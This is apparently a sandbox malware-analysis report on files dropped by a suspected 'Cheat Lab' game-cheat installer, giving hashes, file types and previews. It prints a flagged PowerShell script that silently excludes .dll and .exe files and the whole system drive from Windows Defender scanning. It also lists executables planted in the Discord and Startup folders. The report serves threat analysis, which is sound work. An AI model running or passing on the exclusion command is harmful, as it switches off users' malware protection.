                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MSIF479.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MSIF507.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):919520
                                                          Entropy (8bit):6.451406895673526
                                                          Encrypted:false
                                                          SSDEEP:24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
                                                          MD5:6189CDCB92AB9DDBFFD95FACD0B631FA
                                                          SHA1:B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
                                                          SHA-256:519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
                                                          SHA-512:EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...!S..!S..!S[."R..!S[.$R=.!S.%R..!S."R..!S.$R..!S[.%R..!S[. R..!S.. S..!S3.(R..!S3.!R..!S3..S..!S..S..!S3.#R..!SRich..!S........................PE..L...a<.a.........."!.....X...................p...............................@.......|....@.........................`A..t....A.......0.......................@..L...(...p...............................@............p...............................text...nV.......X.................. ..`.rdata.......p.......\..............@..@.data...<....`.......@..............@....rsrc........0......................@..@.reloc..L....@......................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MSIF527.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MSIF557.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\MSIF577.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Pro87D.tmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):954
                                                          Entropy (8bit):4.937735805475593
                                                          Encrypted:false
                                                          SSDEEP:12:ISt0RiY7GSd1VIk/ko+jLbdhFp+9wkvt0Ri9qVIk/ko+jLbdhFp+9wkv:nt0vndd/ko+3bdh5wt0gQ/ko+3bdh5m
                                                          MD5:FA3F83871A37B5B904332F6AD851F38A
                                                          SHA1:628A558BEF01966F79A309025A9BE0538D33A0C6
                                                          SHA-256:2DEC36E29E4EDFA5A10FBB5019E6C974166960C18AFFF6F30161096A4FA1E173
                                                          SHA-512:D5C4005898290CB74A645C300865D504785058FEE1B45F75B6E441250D7ADD4F235C96C543D3BA6C9E949BA52B4AA2C5C21827BB3024CFCD8FEB0D4649FFB8FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0f4w2pui.hma.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0v5duese.dio.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2gv3p5d.l0n.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjwkxqjg.jaw.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0xugard.ykt.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzehbjic.slw.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdyjqhyk.ivs.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyrsxjyz.vlt.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaghwege.yuk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfro1sxk.l4o.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\pss87C.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5784
                                                          Entropy (8bit):3.4920621874565785
                                                          Encrypted:false
                                                          SSDEEP:96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
                                                          MD5:FC1BB6C87FD1F08B534E52546561C53C
                                                          SHA1:DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
                                                          SHA-256:A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
                                                          SHA-512:5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                          C:\Users\user\AppData\Local\Temp\scr86B.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):354
                                                          Entropy (8bit):3.5299924240696643
                                                          Encrypted:false
                                                          SSDEEP:6:QJilMcRIW02qGNlGtulZ/x56FpwkDjkRH37cnlj+SEEg8ZzWY:QJGHRIWT3GtqZ/epdjkh37kCsZyY
                                                          MD5:600BFA83AD3A937D36FB345A0CEE05A8
                                                          SHA1:527CEFC6C6FCF5D67920546F2A7BEF0DB53D43BE
                                                          SHA-256:FC1B5B652EE5E91939A8B7113280866DE2A31ADA0609C47FA3A2951CC96F5507
                                                          SHA-512:CF313D2250FCD98EDBCB9C63C3D38AC3A35D7E2935E58BA69D8E488728D930230D05697C840CA82EE2C004E5F19CBA3612F324E0D0EF76720AE9B888E0CBF9BA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:..P.a.r.a.m.(.).........$.c.o.m.m.a.n.d. .=. .".&. .{. .&. .'.A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e.'. .-.E.x.c.l.u.s.i.o.n.E.x.t.e.n.s.i.o.n. .'...d.l.l.'.,. .'...e.x.e.'. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .$.e.n.v.:.S.y.s.t.e.m.D.r.i.v.e. .-.F.o.r.c.e. .}.".........p.o.w.e.r.s.h.e.l.l. .-.W.i.n.d.o.w.S.t.y.l.e. .h.i.d.d.e.n. .-.C.o.m.m.a.n.d. .$.c.o.m.m.a.n.d.

                                                          C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1073657860
                                                          Entropy (8bit):0.016763196553014763
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B9DD622108F62A2288DEB12C8A7D85BA
                                                          SHA1:ADFCEFA6244DE1AAAB1CC8E77CD4E9998A42E6E8
                                                          SHA-256:32989B7C4647E1829CE0434B7EF60C70ABDA320ACE2D82C6A5A16C03524993D7
                                                          SHA-512:FC75846B24D629B9BC9D93F24F631185F5AC70E072062894198AEA9C8CEF84658D757C46D6D0F23783C7657FB07D413457305B7C19A99198ABDE6233DE9AB6FB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:MZ`.....................@...............................................!..L.!Require Windows..$....................c....................................................A.....A.....A......A.s........A.....Rich..................PE..L...9D.W.................B...n..............`....@.................................._......................................,........`..Dx..........C....1..............T...........................h...@............`...............................text....@.......B.................. ..`.rdata..j....`.......F..............@..@.data....\..........................@....rsrc...Dx...`...z..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.790557976647158
                                                          Encrypted:false
                                                          SSDEEP:48:68kM4rRDxNMk+wwnikZsFtRvlm4MI9BFipfbNtm:8vVDB+wwn0/MvzNt
                                                          MD5:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          SHA1:013F5AA9057BF0B3C0C24824DE9D075434501354
                                                          SHA-256:9B860BE98A046EA97A7F67B006E0B1BC9AB7731DD2A0F3A9FD3D710F6C43278A
                                                          SHA-512:7446F1256873B51A59B9D2D3498CEF5A41DBCE55864C2A5FB8CB7D25F7D6E6D8EA249D551A45B75D99B1AD0D6FB4B5E4544E5CA77BCD627717D6598B5F566A79
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........."...0.............b&... ...@....@.. ....................................@..................................&..O....@.......................`.......%............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D&......H.......l ..............................................................J ....(....(....&+...(....*.BSJB............v4.0.30319......l.......#~..0...`...#Strings............#US.........#GUID...........#Blob...........G..........3......................................................%...l.%...3.....E.....[.................S...........8.....r.....G.................Y...........".........................=.....P ........,...c ................T...................).....1.....9.....A.

                                                          C:\Users\user\Pictures\9E146BE9C76A4720BCDB53011B87BD06

                                                          Download File
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):2048
                                                          Entropy (8bit):3.964154738242649
                                                          Encrypted:false
                                                          SSDEEP:48:YM0gdPmt55KnChgrpE5S6mcr7RpHtaHQAs9l:fdQD6CIjAPHtmQAs7
                                                          MD5:A9AA29ACAEFBFFC8F28FFAD10BC1B50D
                                                          SHA1:7A7C02F681A7D4B880D3A123A6BC185A8D286E2C
                                                          SHA-256:46EA490C95C53B6F204749AEF768B4B5F1E1E92D180EECCEE60AAB38C02B1BA3
                                                          SHA-512:A2A8ECB869276B683E251AB49C6DF13443B66BF4DD123748B590E0E7332084E651908EDAAAADE09422FA8C5536B91517CF2BBC3C82916ADD138830CEAEA4B5FC
                                                          Malicious:false
                                                          Reputation:unknown
